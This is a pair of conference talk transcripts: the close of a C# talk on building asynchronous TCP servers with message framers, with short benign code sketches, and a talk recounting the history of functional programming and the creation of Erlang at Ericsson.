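Because every segment handed to BeginReceive points into the one pinned-friendly slab, pinning no longer scatters immovable objects across the nursery.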
So if we go and look at one of the protocols a little bit like that, where are we? I think this is the last one of these I have. What we're going to do is make our echo server a little bit more user-friendly to people typing into telnet. And rather than sending back every character, what we're going to do is use a horrible protocol which is really open to denial-of-service attacks: we're going to wait for new lines in our data before we send it back. The reason that that's a horrible protocol is because it's unbounded in how much data we might buffer before we send anything back, meaning a particularly malicious client could just send us a load of data and fill up our memory. So what we have instead, what we're going to do, we have this interface called a message framer. And what that's going to be doing is be responsible for looking into the data we've received through our calls and deciding when we've got a message that's complete enough to send on to the processing part of our application. And that particular implementation of this, what have I called it? I've even called it crappy temporary framer. So what that's going to do is try and parse every segment as it comes in. I'll look at where it's hooked up in a second. But basically we're going to copy all the data into our own array. This one isn't going to be pinned, so it's not such a problem that we're allocating it. It might still be better not to do that for other performance reasons. And then we're going to assume that we have a string, and we're going to see whether it's got a new line in it. And if it has, we're going to call the handler that we've registered with this class to say, here's a message that we've got; this is good enough that our application downstream can start processing it instead of keeping it internal to the TCP transport. And I haven't implemented Frame in this case, so our callback is just a, here's all the data, go do what you want with it.
If you're implementing a protocol that has a known wire format, you probably have some kind of thing that's capable of deserializing the messages, or translating the message into some internal structure that the rest of your program can deal with. So let's look at where this is hooked up. It's actually in our basic echo server class again. Where are we? It's in this OnDataReceived. The first time that we get some data on a connection, what we're going to do is decide whether we've already seen data for that connection before. This is a really good reason why we gave the connection an ID earlier. We need to be able to track, if we're going to do this asynchronous, sort of re-entrant type stuff, where we're not guaranteed we're going to get a whole message in one callback, because apart from anything else, we're only receiving 1,024 bytes at a time. It could be over many calls. We need some way of correlating the messages together by socket. So by giving the connection an ID, we've come up with a key that we can use for that and that we can easily get back. So as part of our little protocol implementation, we're going to have a ConcurrentDictionary keyed by GUID, which is what our connection ID was, and then we're going to link back to the actual connection, and we're going to link back to the current framer, which is going to be responsible for storing the state of the messages that have been received over that particular socket at the moment. So when we actually get some data, we can go and look up in that dictionary whether or not we already have a framer for it, and if we haven't, we're just going to register a new one.
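The newline-framing idea described here can be sketched in a few lines. LineFramer is an illustrative name, not the actual interface from the talk; the key property is that a message may arrive spread over any number of receive callbacks:

```csharp
using System;
using System.Text;

// Buffers incoming chunks until a '\n' appears, then hands each complete
// line to a registered callback. Deliberately naive, like the talk's
// "crappy temporary framer": the pending buffer is unbounded.
class LineFramer
{
    readonly StringBuilder _pending = new StringBuilder();
    readonly Action<string> _onMessage;

    public LineFramer(Action<string> onMessage) { _onMessage = onMessage; }

    // Called once per receive callback; one message may span many calls.
    public void UnframeData(byte[] data, int count)
    {
        _pending.Append(Encoding.ASCII.GetString(data, 0, count));
        int nl;
        while ((nl = IndexOfNewline()) >= 0)
        {
            _onMessage(_pending.ToString(0, nl)); // complete line: pass downstream
            _pending.Remove(0, nl + 1);           // keep any trailing partial data
        }
    }

    int IndexOfNewline()
    {
        for (int i = 0; i < _pending.Length; i++)
            if (_pending[i] == '\n') return i;
        return -1;
    }
}
```

In the server, one of these would live in the per-connection dictionary entry alongside the connection itself, keyed by the connection's GUID.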
Now, I have stuck a nasty little hack in here, because our echo protocol doesn't actually have any kind of way of correlating back to a client, because we're just receiving ASCII over it, or UTF-8, or whatever we're sending over, actually. So I've chosen to make it so that whenever we start a new one, we just serialize that little client ID back into the message so that the downstream provider can get it when they need to. Otherwise, all we're going to do is, you know, just go through and unframe the data every time we get it, which in our case was going through looking for new lines and deciding whether or not we've got a good enough message that we can pass it on downstream, and then go back to receiving so that we can get more if we need to. So when we get a complete one, this callback will be called by the message framer. And what that's going to do in our particular case, we know we can get the connection ID back. All we're going to get is the data; we're not going to get some kind of tuple of the data and the connection, although we could do that as well. It's just a bit harder to go through and implement. So when we've got a complete message, we can go and get the socket back and then just enqueue the data; we can go and enqueue a send of whatever we were sent in the first place. And then our abstraction in the background will go and send that over the socket and make sure that everything's good there. So if we run this version of it, we should now be able to deal with multiple clients. So if I do telnet 127.0.0.1 11000, then we should be able to type, and we won't necessarily see anything at the moment, because it's not actually echoing yet. But if we press enter, we should get our text back. Now we see it. I don't know why the Microsoft telnet client does that, but apparently it does. And again, and we should be able to deal with multiple clients. So how about this one? Yep.
And our messages end up being correlated back to the right connection because of that little lookup dictionary we had. And if we quit, we'll see the same stats about each connection. So we've gone from having something that's entirely blocking, only dealing with one client at a time and doing horrible things to our memory, to being able to deal with multiple clients without doing anything nasty to our memory profile. All still single-threaded, right? All of this is still running on one thread. So let's go and look at an actual protocol, an actual use of this sort of stack. And for that I'm going to go into the Event Store code base here. This stuff is all open source; it's all on GitHub. Oh, hold on, is that the right thing? That might not even be the right thing. Most of the classes that we were just looking at came straight out of this code base. They've been tested reasonably heavily. So in this particular case, rather than having a basic echo service or something like that, what we have is a TCP service. And it's capable of listening to a few messages. We're messaging all around this thing internally. But it's capable of listening to a few messages which tell it when the system should be shutting down, that kind of thing. But the important thing here is, when we get a connection accepted, we start up one of these TCP connection managers, which is basically the same abstraction we had earlier, and we start receiving on it. In that particular case, our on-the-wire format is very similar to the AMQP one. We send frames of messages, sorry, we send delimited messages where we send the length of the message first and then we send the actual data of it. The data happens to be a serialized protobuf. Protobuf was perfectly fast enough for us, and there are plenty of other alternative formats for that. So in our case, the message framer looks slightly easier. It's this length-prefixed one.
And what that does is exactly what we were doing earlier, but rather than looking for new lines, it's looking for us to have enough data. And it's also looking for the data to be valid in some ways. So we build into the header something like, we know that the first n bytes are actually not going to be a serialized protobuf. It's going to be a message ID. It's going to be a correlation ID. It's going to be some authentication information, and that kind of thing. So we deal with all that here. But then the complete thing that we deal with is actually, where is that method used? That's the easiest way of getting to it. The OnMessageArrived callback is going to look very different. What we're going to do is package it up into this message type here, which is basically responsible for transporting all of the information about the particular message that we've just got, which we've turned into a package. And that's going to go on to the next stage in the process, which deserializes the protobufs and then sends the message on to the next processor. So it will enqueue it for something else to deal with, depending on the type of the message that we see. The same thing happens in reverse for sending. So there are a number of TCP send services, TcpSendService, I think it's called, which are basically responsible for handling other parts of the application saying, we need to send this thing over TCP; then it will deal with getting it down the right socket based on the client's ID. So this model tends to work quite well if you're trying to deal with long-running clients and you're trying to deal with lots of them. It's probably not so great if you're trying to deal with lots of transient clients. So it's probably not, for example, the best way of writing an HTTP server that's supposed to deal with lots of clients.
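The length-prefixed framing idea can be sketched as follows, assuming a 4-byte little-endian length followed by the payload. The field layout here is simplified; the real Event Store frames also carry a command byte, correlation ID, and authentication info inside the payload, which this sketch omits:

```csharp
using System;

// Accumulates a 4-byte length header, then that many payload bytes, then
// fires the callback with the complete frame. Input may arrive in any
// number of arbitrarily split chunks.
class LengthPrefixFramer
{
    readonly Action<byte[]> _onFrame;
    readonly byte[] _header = new byte[4];
    int _headerGot;     // header bytes received so far
    byte[] _frame;      // frame being assembled; null while reading the header
    int _got;           // payload bytes received so far

    public LengthPrefixFramer(Action<byte[]> onFrame) { _onFrame = onFrame; }

    public void UnframeData(byte[] data, int offset, int count)
    {
        int i = offset;
        while (i < offset + count)
        {
            if (_frame == null)
            {
                _header[_headerGot++] = data[i++];
                if (_headerGot == 4)
                {
                    _frame = new byte[BitConverter.ToInt32(_header, 0)];
                    _headerGot = 0; _got = 0;
                    if (_frame.Length == 0) { _onFrame(_frame); _frame = null; }
                }
            }
            else
            {
                int take = Math.Min(_frame.Length - _got, offset + count - i);
                Array.Copy(data, i, _frame, _got, take);
                _got += take; i += take;
                if (_got == _frame.Length) { _onFrame(_frame); _frame = null; }
            }
        }
    }
}
```

Unlike the newline framer, this one is bounded per message by the declared length, although a production version would also want to reject absurd lengths up front.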
It's not bad if you're trying to build a database client and it works well for us. With that, I'm kind of out of demos. Does anybody have any questions about all this kind of stuff? Or if not, then, oh, sorry, go ahead. Okay. So the question is, if you compare it to WCF's net TCP binding, then what might be the advantages of doing this? So the first advantage is that you're not tied to the SOAP protocol, which WCF is. So it may be that, huh? Okay. So my understanding of the net TCP binding was that it would basically be dealing with you. The only advantage you're going to get from it is for it to marshal your messages for you and deal with the SOAP headers, right? Maybe I'm misunderstanding that. Okay. So if it's doing a thread per request, then what you may end up seeing is actually a lower latency per request. But the chances are you'll be able to deal with a lot fewer concurrent clients well and you'll degrade worse under high load because there'll be a whole lot of context switching between client threads. So I'm not entirely familiar with the underlying implementation of the WCF bindings. Last time I looked at it, it didn't appear to be that much use for just implementing general protocols. That may not be the case anymore. Oh, sure. If you have control over the client and the server and you want them to be communicating like that, then it may be a perfectly good choice for you. You probably have to measure it in your specific use case. I'm not familiar enough with the internals of that to be able to tell you. Are there any others? Greg? Oh, yeah. So actually one of the other things that I should go through and point out, there is a type in the event store called a buffer pool stream, which will use those preallocated chunks in an implementation of streams. So if you're doing, for example, lots of XML manipulation, so you're deserializing a large XML document, it may be useful to do that to avoid the same kind of memory issues that you see with that. Yeah. 
Yeah, potentially. So the array segments themselves aren't allocated, because they're structs. And I think the concurrent stack is going to use a pre-allocated, it's an array-backed thing, right? So if you know roughly the size that you're after up front, then you could specify that to the stack on construction. It should allocate enough space to not be churning too much, I guess. Cool. With that, time for a beer.
Many people say that the arrival of good garbage collected languages mean you don't have to worry about things like memory management any more. This might be the case for line of business software, but what about when you want to write a TCP server capable of dealing with a decent number of connections? In this talk we'll look at the challenges of TCP servers in C# by converting a synchronous, thread-per-client server to use hipster-compliant asynchronous evented IO and then optimising it not to die from GC pressure.
10.5446/50607 (DOI)
Hello. Can you hear me? Anybody hear me? Anybody not hear me? Put your hands up if you can't hear me. Yeah, I'm giving two talks here, so I hope I'm giving the right talk. This is the one about functional programming. I've sort of tried to interleave what I've done in functional programming with the history of what was happening at the time. So I'm going to go back to about 1985, when I started doing this, and kind of give it a historical perspective. I think when I started programming, there were only a few programming languages. I had to choose between Fortran and assembler and Cobol. And now I think there are 2,500 programming languages to choose between. It's actually much easier to choose between three than 2,500. And of those, there are probably only about 30 or 40 that are worth using anyway. And that's tomorrow's lecture: how we got into this colossal mess and how we've totally fucked up all the software structures with far too many programming languages. And I'm one of the people who've been making programming languages, so I've kind of contributed to this. So tomorrow I'll admit my sins and possibly talk about some little ways of getting out of that. But that's tomorrow's lecture, not today's lecture. So this lecture is all about, well, the title is Functional Programming: The Long Road to Enlightenment. And I'm going to tell you about two things. I'm going to tell you a little bit about the history of functional programming, and I'm going to interleave that with my own personal involvement with it, so you can kind of see how things fit in. And so I'll run it along a sort of historical timeline, and that timeline starts, for my part, in about 1985. This slide is actually quite an old slide. I've used it quite a lot, because it represents the world as it was in 1998 or 1999, when I gave an invited talk at ICFP, the International Conference on Functional Programming, where I gave the history of Erlang.
And it stops there for a reason, which I couldn't reveal at that conference. So I shall reveal why it stops there and then what happened after that. So I'm going to go back to about 1985, when, I used to be a physicist, and I got a job at Ericsson in the computer science lab. And that was a newly started lab, and so we were just kind of messing around with programming languages. So here I am in 1985, a young lad of, you know, how old was I then, 30 or something, with a glint in my eye, and I didn't know anything about programming. I used to be a physicist and was now working as a computer scientist, which was quite fun. So if you look, oh, sorry, just back off a little bit. If we look at the decades of programming, not many languages have really survived into the future. Some of them took with them ideas and they've lasted forever. Others kind of died, or they're still around because of legacy code, but they haven't influenced future languages. So we have these decades of programming, and starting off in the 1950s, that was the first stage of programming languages: Lisp, Algol, or Cobol, Mercury Autocode, things like that came along. And what lived into the future was, I guess, the Fortran and the Cobol and the Lisp. Lisp was the progenitor of all the dynamic languages, and Fortran was the progenitor of the statically typed imperative languages, and so on. And then in the 60s, APL and PL/1. PL/1, of course, at the time everybody said, well, PL/1 is the language of the future, everybody will be programming in PL/1, and it wasn't the case. It didn't work out that way at all. The 70s: Basic, Smalltalk, Scheme, the Bourne shell, C came along. Smalltalk, of course, the progenitor of the object-oriented languages. I mean, this was object orientation done correctly. It was replaced by Java and C++, object orientation done incorrectly.
Smalltalk only got one thing wrong, which was its concurrency model, but apart from that, it was a pretty decent language. And then, oh, wait a minute, I haven't got, well, there's a language which has survived to today and is still used. I should have put Prolog in the list, which is 1972, but I don't think many people use it today. It's highly influential, and it's one of those nice languages that should have survived. But unfortunately, not many people use it. It has survived in niche domains like constraint logic programming, to schedule airlines and things like that. Basically, Prolog is so good there aren't any problems that are worthy of its use. Robert Kowalski said that Prolog was a solution in search of a problem, but there weren't any problems that were difficult enough for it. So people use Java and things like that instead. And then in the 90s, Haskell and a load of scripting languages came along. The real sort of Haskell-type languages came relatively late; they came in the 1990s. The logic programming languages came in the 70s, so actually 20 years ahead of the functional programming languages. And I'm not talking about functional programming as an academic discipline, of course, with Church and the lambda calculus from the 1930s, but nobody knew about that, because you couldn't actually run any programs in the typed lambda calculus in 1936 or something like that. And then in 2000, we've got C# and Scala and Go, and 2010. I don't know which languages will survive from 2010, possibly Julia, which seems to be a very nice language. We'll have to look, have to give a lecture in 2030 to, well, I probably won't be alive then. You'll have somebody here who will have to give a lecture in 2030. Right. So these are the kind of significant languages. I found this on the net somewhere; somebody had just made a list. And I'm just looking at the dates when they came in.
1957, Fortran; the first dynamic language, Lisp, 1960; the first logic programming language, Prolog, or, the arrow points wrongly, 1970; actually I said '72, it was '70 there. Smalltalk-80; actually, Smalltalk-72, which surprisingly was done in 1972. You could guess that from its name. And Standard ML came in in 1984, Haskell 1990. We were talking about functional programming; really there wasn't much functional programming before ML, I think, Standard ML in 1984. Of course, although it came out in 1984, I didn't know about it in 1984. So when I started work, which was in 1985, what did I know about? Well, I knew about logic programming, I knew about Prolog, and I knew about Smalltalk. And of course, everybody knew about Ada and PL/1 and the Algol family of languages. So I didn't actually realize I was a functional programmer; I was a closet functional programmer for five years, because I started off with Prolog and Smalltalk, kind of merged the two together to make a parallel logic programming language. And that with time became more and more functional. So I sort of slowly moved over to functional programming. Right. I just thought this was nice as well, because if you're functional programmers, there's a very nice talk by David Turner which gives a history of the road to Haskell. It starts, of course, with the lambda calculus, or the typed lambda calculus, in 1936. These are from his lecture. Lisp came in 1960. Lisp is not actually an implementation of the lambda calculus, because it turns out that McCarthy didn't actually know about the lambda calculus at the time. It wasn't influenced by Church in the slightest; it was an independent invention. Then Algol 60, ISWIM, if you see what I mean, Peter Landin. He wrote this great paper, was it 600 or 800? The Next 700 Programming Languages, I believe. He had this ISWIM notation, which was the first, and then PAL and SASL.
And in the late period, 1969 to 1980, NPL, Hope, and so on came from Edinburgh. And by a strange coincidence, I had a job in Edinburgh, because I was a physicist and I'd just got a job working at Edinburgh. So I was fortunate enough to learn Prolog from Robert Kowalski. That was very early. And as students there, we were all going, well, Kowalski's either mad or he's a genius. We couldn't figure out which of the two it was, because we didn't really understand what he was talking about. And certainly years later, I've realized that he certainly wasn't mad. I mean, he was very smart. And then Rod Burstall did this new programming language, and then ML and then Hope and then Miranda came out of that, and then Haskell came out. And it's quite interesting, because I talked to David Turner about this, and he remembers coming to Ericsson, giving us a talk on SASL when I was doing Erlang, and we were exchanging ideas there. And we both remembered this. And we got talking about types, and dynamic types and static types, and I said, well, what do you think about types? And he said, oh, well, it doesn't really matter. So SASL was dynamically typed, Haskell was statically typed. It's not a religion; it's just a sort of practical thing. They're equally good, he said. And I thought, that's quite nice, because he was the father of the polymorphic statically typed languages, and yet he wasn't very religious about it. He's a very practical man. And then, okay, so that's functional programming. Logic programming actually came earlier, with Alain Colmerauer and Philippe Roussel, based on the work of Kowalski. Kowalski made a theorem prover for Horn clauses which could be implemented in an efficient way, and out came, I mean, sequential Prolog. Because there was no time or anything like that, Prolog turns out to be quite easy to parallelize.
And so the first parallel logic programming languages came out in the early 80s: Concurrent Prolog, and Parlog, and KL1, Flat GHC. These are languages that very much influenced Erlang, not in the syntax or anything like that, but in the implementation, because when we were doing Erlang, we were looking at how Parlog was implemented and how KL1 was implemented to gain inspiration. This is all before I started work. This is prehistory. In 1982, something very significant happened. Japan's Ministry of International Trade and Industry started an $850 million project to create a massively parallel computer based on Prolog. This was a Japanese effort, and it came out in 1982. And this guy, Ehud Shapiro, went off to Japan, was sent there, and he wrote a study, and he reported back, and he said: as part of Japan's effort to become a leader in the computer industry, the Institute for New Generation Computer Technology has launched a revolutionary ten-year plan for the development of large computer systems which will be applicable to knowledge information systems. This was the fifth generation. And that report didn't have much significance, I think, largely until Feigenbaum wrote this book, The Fifth Generation, which came out, I think in, I can't remember the date, I think it was '83, something like that. Yeah, I think it was '83. This book caused a storm in America. And they said, the Japanese are going to build this thing, this massively powerful parallel computer that can do everything, and we have to do something about this. And so as a result of that, in the US, very quickly, they formed the Strategic Computing Initiative with DARPA funding, which was going to fund it with $1 billion from 1983 to 1993. And one of the people in there wrote, the machine would run 10 billion instructions a second to see, hear, think like a human. You know, it was going to do real-time natural language translation and all these things. It was fantastic.
Wow, this is great. Once we've built this mega-LIPS Prolog machine... I'll just put in there: in 1987, they cut all the funding for this project because they weren't getting anywhere, and the project kind of fizzled out by 1987. But in 83, there was loads of money around. And in Britain, the Alvey project started, and they chucked in 350 million pounds to build a declarative machine that would run Hope. Hope was a sort of, it had come out of ML and NPL, a new programming language from Edinburgh. It was named after Hope Park Square, which is in Edinburgh, and the Department of Machine Intelligence and Artificial Intelligence was centered around Hope Park Square. And they were going to make this declarative architecture that would execute declarative, functional, and logic programs extremely quickly. And if you look at Hope, that's the factorial function in Hope, it looks like that. And you'll notice it's very similar to what factorial looks like in Haskell or Erlang or any of these programming languages. They all kind of date back from there. So that's the prehistory. And so then I arrive at Ericsson in 1985. The projects haven't been cancelled, because it's not yet 1987, when they realized none of this stuff was going to work and cut all the funding. And the funding is absolutely amazing. So it's really good. And everybody's rushing around going, what the hell, you know, Prolog, Prolog, let's build declarative machines and do all this stuff. So I sort of arrived there. And I learned Prolog and I thought, wow, Prolog, everybody's going to do everything in Prolog in the future. Turned out to be completely wrong, but that's what I thought at the time. So here we are in 1985. And at the time, everybody said, well, Ada and PL/1 are going to be the languages of the future. Everybody's going to be programming PL/1 forever. How many of you are programming PL/1? How many in Ada? Oh, one person. Very good. Thank you very much. Yes, right. So I take it with a pinch of salt.
Somebody says, well, everybody's going to be programming in Java++ in the future, or whatever they say. Because these things last a few years and then something better comes along. Well, if something better doesn't come along, we're sunk, because we need better stuff. In 1985, IBM was at its height. It had 450,000 employees worldwide. And it actually started shrinking after that. Microsoft Windows was released in November. Machines had a few megabytes of memory. So this is 1985. It's a typical PC; well, no, it wasn't a typical PC, it's one you could buy if you had lots of money. It's not the one you bought at home. It was one that was bought for you at work. And it had a colossal 256 kilobytes of RAM. You could extend it up to three megabytes by adding a few expansion cards; these are big cards you plug in. And it had this blazingly fast 8 megahertz clock. And you could have a 10 or 20 megabyte hard disk. That's 1985, actually. So you have to ask yourself, you know, that thing in 1985 would boot in 120 seconds; a processor today, 10,000 times faster, should boot in 12 milliseconds. But my machine doesn't boot in 12 milliseconds. So what the hell went wrong? I'll be talking about that in my lecture tomorrow, what the hell went wrong. Different subject. So using machines like this, I wanted to program this. This is a telephony, because I work for Ericsson, this is a telephony flow diagram. It shows three parallel processes. Time is proceeding down the screen and messages are being passed between them. It's three communicating finite-state machines. And I wanted to find a convenient way to program that. So, right about 1985, I discovered Prolog and I started writing these things in Prolog. And I was trying to dig out the first version. I completely lost the first version. So the first version I could find is this documentation for version 1.06. And in the comments it says version 1.03, lost in the mists of time.
So I haven't actually got anything that goes back beyond that. So that's the first ever thing that I could find. And yeah, so that's kind of around about 1986. I was actually developing a programming language. I didn't know I was developing a programming language at the time. If anybody had said that in 20 or 30 years' time lots of people would be using it, I'd have just said they were mad, because I didn't even know I was making a programming language. So having developed a programming language, the first significant thing that happened was we had the good fortune to come into contact with a group of people who wanted to use the technology we were developing. This is Kerstin Ödling. And she had an application. She wanted to build something. Now I would recommend, you know, it's very good if you're making a new technology, get a user. You know, I mean, computer scientists will just invent stuff. If they're given nothing to do, computer scientists will just invent stuff, which is totally useless, right? Because they don't actually have any problems. Given no problems at all, they will invent their own problems and solve them. So you want a real human being of flesh and blood, somebody who isn't interested in programming, isn't interested in computer science and wants to build something, right? And then you cherish them. So this is Kerstin Ödling. And what she wanted to do was program this thing. This is a telephone exchange. It's an MD110. And she'd worked out a better way of programming these. These were programmed in a language called PLEX. PLEX was, for its time, it comes from 1978, a very good programming language. It's probably the precursor of a lot of object-oriented programming languages. But it was proprietary. It was secret. Nobody knew anything about it. And for that reason, it never spread. But it had certain concepts in it, like blocks and signals, which have correspondences in languages like Prolog. Sorry, not Prolog.
Smalltalk and languages like that. Above all, it had memory protection between processes. So Erlang's got a lot of things that came from PLEX, actually. The memory protection in particular came from PLEX. She wanted to program this thing. And she was a great fan of what she called fishbone diagrams. These are logic trees; they're decision trees, they haven't got any cycles or anything like that. She would write diagrams like this. That's a bit of a fishbone diagram. It's just a finite state machine with no cycles in it. But what you want to do is execute lots and lots of them in parallel. So you've got thousands of them running in parallel. So how do you run lots and lots of these in parallel? So that was the question I wanted to answer. Given a finite state machine, how do you do that? Well, one way of doing it is to run it and suspend it by putting it into a database, and then when it wakes up, pull it out of the database. That's not a really good way of doing it. There are other ways of doing it. The way we hit upon, or thought up, was just to put this in a process. It's in memory. We need a very lightweight mechanism for doing this. So I wrote this in Prolog. And this was, oh, there we are, back again. If you look at that diagram there, it turns out to be a bit of code that looked like that. That's Prolog, actually, because Prolog has infix operators, and so I could do that in Prolog. But Prolog is a sequential language. And so the way of implementing concurrency was: you execute a sequential process, and you more or less run it to completion. Actually, you run it for a certain number of inferences, or until it wants to receive a message and has no such message, and then you suspend it. Suspending it means putting it in a database. And then there's just a simple round-robin scheduler. So I wrote that stuff. And then by 1988, this was delivered to Kerstin Ödling and her group.
And they built a telephony exchange with it, a prototype of that. But it wasn't very quick. Here you can see what I called the multi-process version. This is the first version that had parallel processes in it. And as you can see, it took four days; it was four days for a total rewrite of the language. So I mean, it's just a smallish Prolog program, maybe a couple of thousand lines of Prolog. You could rewrite it all in a few days. And it was pretty slow. It was doing 245 reductions a second. A reduction is just a function call. But it was fast enough to be able to prototype this telephone exchange that we wanted to build. In 1989, Ericsson took a decision to make a product based on that. We decided that we would have to speed up the implementation; the language was far too slow. It had to be about 8,000 times faster to make it into a product. Then we needed documentation and all this other stuff. So we started two activities in parallel. One was the programming of the product, which we expected to take about two years. And the other was the speeding up of the virtual machine, which we also expected to take about two years. We thought they would converge and it would be fast enough, and we could do all this stuff. So in 1989, we started that project. We needed to develop courses. This is before PowerPoint. So it was just sort of hand-drawn overheads on slides. I'm not a very good artist, but I had quite a lot of fun doing the slides. I think PowerPoint just sort of killed all creativity. This is a head and tail of a list. We needed documentation. You've got to have documentation. I wrote the complete documentation of the first Erlang system, which fit onto one page, actually. So that's the first documentation. I mean, it's now 120,000 files of XML or something. It's a bit bigger than that. But that was good enough. And the users were very good. They didn't complain if you changed the language.
If the next version of the language wasn't the same as the version they had the week before, they just happily swallowed that without complaining. So it was very good. And we had small machines. Remember I said that machine was pretty small. So stuff we didn't use, we removed. Nowadays, you've got whacking great big machines, and all this crap that you should throw away, you don't have to throw away, because your machines are so big you can swallow all the crap as well as the good stuff. But in those days, we had to throw away all the rubbish because space was limited. Right. That was the documentation. Performance. Performance was absolutely lousy. This is a sort of time plot up to the late 1980s. It just shows the number of reductions per second and the technology we used to do that. And the green and red show: green is experiments and red is production, when you put this stuff into production. And you'll see there that there's a gap. It's about a year-and-a-half period when you mess around with an interpreter or an implementation technique and then you deploy it. And you've got these phases of coming in and going out with different technologies. So the one-kilo-reductions-per-second stuff, that was the interpreters. We did a failed experiment with Strand, the logic programming language developed by Ian Foster, based on KL1 and the Japanese fifth-generation languages. And that's the first and last time I ever predicted how fast something would go before I had implemented it, because we confidently told people how fast this thing would go before we'd implemented and measured it, and we were completely wrong. So I've never done that since. The project managers keep going, when will your program run? I don't know. How fast will it be? I don't know. And you just stonewall forever. If a project manager asks you when your software will be ready, just say, I don't know. I've never done it before. And never give in. Right. Because you always get into trouble.
If you say it's going to take six weeks and it takes two years, you get into trouble. And even if you say it'll take six weeks and it takes two minutes, you also get into trouble. And you never know. So just say, don't know. Right. So that was the failed experiment. There was no production. And then there was the JAM, Joe's Abstract Machine, based on the Warren Abstract Machine. And that was in production for quite a long time until it was replaced by a better machine. And here we get up to 1988. So this is, I don't know if you want to know how Erlang works. Anybody want to know how Erlang works? Briefly. Oh, jolly good. So this is how Erlang works. Each process has got a stack and a heap and some registers. And all of that fits into about 350 bytes. Okay. And it's preallocated. Actually, I think we preallocate a kilobyte per process, with the stack and heap growing towards each other, and a set of registers. This is how the JAM worked, actually. Erlang's got terms, symbolic terms. Think of them as structs in C. So here's a struct containing a rectangle: the atom rectangle, that's a symbol, and a couple of integers, 10 and 20. So in memory, that's represented as a tagged pointer. There's a tag that says, hey, I'm pointing to a tuple. That can be on the stack or heap. And there's an address. And at that point on the heap, and in fact a tuple will always be on the heap, it points to a tagged word that says, hey, I'm arity 3, I'm a struct with three things in it. And then there are three words. One says, hey, I'm an atom, and there's a pointer into an atom table. And then there's something that says, hey, I'm an immediate integer, and the value 10 is in there. This is for a 32-bit or 64-bit machine. That's the memory organization.
So if you wanted to build that tuple, you could say: push integer 20, push integer 10, push atom rectangle, and make tuple 3. This is pretty much how the old Warren machine used to work. You're just moving things between the stack and heap with instructions. Okay. So when you've done all that, you're going to have the built object, the tuple: a tuple that points to something on the heap that says, I'm a struct three words long, and it says, I'm an atom, and here's the pointer. Everything's fully tagged, and it's just sitting on the heap. It doesn't take much space. And the code to do that: let's suppose we've got a function foo that returns the tuple {10, abc}. The complete code just says, well, enter foo, that's just a label that says this is the start of the foo function. What are you going to do? Push atom abc, push int 10, make tuple 2 and return. Now each of these things just becomes byte code. If I take those two instructions, push int 10 and make tuple 2, well, the push int 10 might be the byte code 16, because it's a byte-coded machine, and 10 is the immediate value; it's a push-short-integer instruction. 20 might mean make tuple, and the argument's 2. And then there's just a little C interpreter that interprets that. So it's pretty simple. That's literally it: the compiler just spits out byte code, the emulator just executes it. It's very much like the JVM, very much like the .NET virtual machine. The instructions are in many instances pretty similar, actually. I mean, the push integer just sort of sticks an integer on the stack; you can't really do much else. So I wrote a compiler for that in Erlang itself, because we had one in Prolog, and then I wrote an emulator for that in Prolog again, and here it was, the JAM. You can see from the handwriting it says I wanted to call it JOSEPH, Joe's super Erlang programming...
No, that didn't really fit. And then Joseph's engine. And it actually went at 3012. That was in Erlang reductions per second when it was interpreted. We could compile this into the byte code and execute it, again all in Prolog. That ran at 35. And we could compile it once a day when I went home, and it would be ready the next morning so you could run it. But that was good enough. We ran through all the test bench suites and everything. The whole machine design was ready, and so Mike Williams then came along. Mike's my mate who knew C. I was writing this in C to speed it up, and I had never written C before. I had written Fortran before that. My first ever C program was the C virtual machine to run Erlang. And Mike read it and said this is the worst program I have ever seen in my entire life. So he rewrote it. So now there were three of us. Robert had joined me about a year before; he was writing all the libraries. I wrote the compiler and Mike was writing the emulator. And we did that. And yeah, now it beetled along at, oh, about 100,000 reductions per second. It was really quite quick. Well, C is actually better than Prolog for implementing virtual machines. It's almost as if it's assembler. So it's pretty good. So here we are. We're at 1990. Yeah. And we've got this thing going. So what happens now? Show the movie. Oh, no, I won't show that. Hop over that. And we had great fun. This is the lab in 1992. We had to illustrate concurrency for people. Parallelism. So we thought, how do you do that? Well, we have a model train and a telephone exchange, and we'll control them from different parallel processes in the same virtual machine. And people who went on the Erlang course always remember this. Because the exercise: you put two trains on the tracks. There's one here. Can you see the mouse pointing to the left? And we put another train pointing to the right.
And the programming exercise was to swap them. And there were little sensors that told you where the trains were. So it's real real-time programming, actually. Great fun. And there's Robert. And we showed this at a trade fair together with the telephone; it was controlling the exchange at the same time. That was in 1992. So that was quite fun. And then what happened? Right. Well, nothing much happened then. 1992 to 1995, nothing much happened. We started Erlang user conferences and things. And that's one of the first ones. At that time, it wasn't open source. It was limited to Ericsson. And we had one room which held 80 people, and that's the number of people who could come. And we had our yearly conference. Great fun. Then, two things have led to Erlang being a successful programming language, and the first of these two things happened on the 8th of December 1995. A project called AXE-N was cancelled. That was a big project. It was going to do everything in C++. It had been running for about six years. And a lot of programmers were involved in this. And it was cancelled. Ericsson had built the hardware and the software, and the software just didn't work. By coincidence, we were working in the same building as this project. So we knew all about it. And we'd also been itching to program their hardware. So we managed to get hold of the hardware after a lot of opposition. So we were programming the same application as they were programming. And we'd done it with six people, and they'd done it with about 800 people. And at the time, words were said and things. We were very untactful in those days, I think, about the differences here. So we got a lot of enemies by mistake. But anyway, they cancelled the AXE-N project and decided to keep all the hardware and now do it in Erlang. Okay, because we could do that. So we started an Erlang group. And that started this OTP stuff.
I moved from the lab into a production organization. We formed this OTP group. And I was technically responsible for this. And we started building this OTP system. And so in 1996, this project called AXD started. And stuff happened really, really quickly. We built up a group. We retrained 60 programmers to become Erlang programmers, and they programmed away. And off we went. And from 1996 to 1998 not much happened. They were just kind of building their stuff. This is typical. You have these periods where stuff happens really quickly, and then you have these long periods where nothing appears to happen, and then things happen really, really quickly again. But in 1998, well, that's the reason why the slide ends there. I have to go back a bit to see why it ends here. In 1998, the AXD was a tremendous success. It worked stupendously well. And it was sold all over the place. And it was such a success that Ericsson banned it, banned Erlang. Right. And there were reasons for that. So I don't really want to go... Well, two of the reasons were: it wasn't Java. And the second reason: it wasn't C++. And Ericsson had taken some strategy decisions to only program in Java and C++. So it wasn't what it was that upset people. It was what it wasn't that upset people. So they decided to ban it. And that's why this slide stops there. Because I had to give a talk at ICFP about the same date, after it had been banned. And so we were rather in this awkward position of, you know, going out there and saying, isn't this great, you know, Ericsson's using it, we're doing all this wonderful stuff. I didn't really want to say it had been banned, because that would sort of, you know, stifle any enthusiasm in the audience. You know, maybe I'll go and try it... and then they learn that it's been banned. And so I just sort of forgot to tell them that, which was funny.
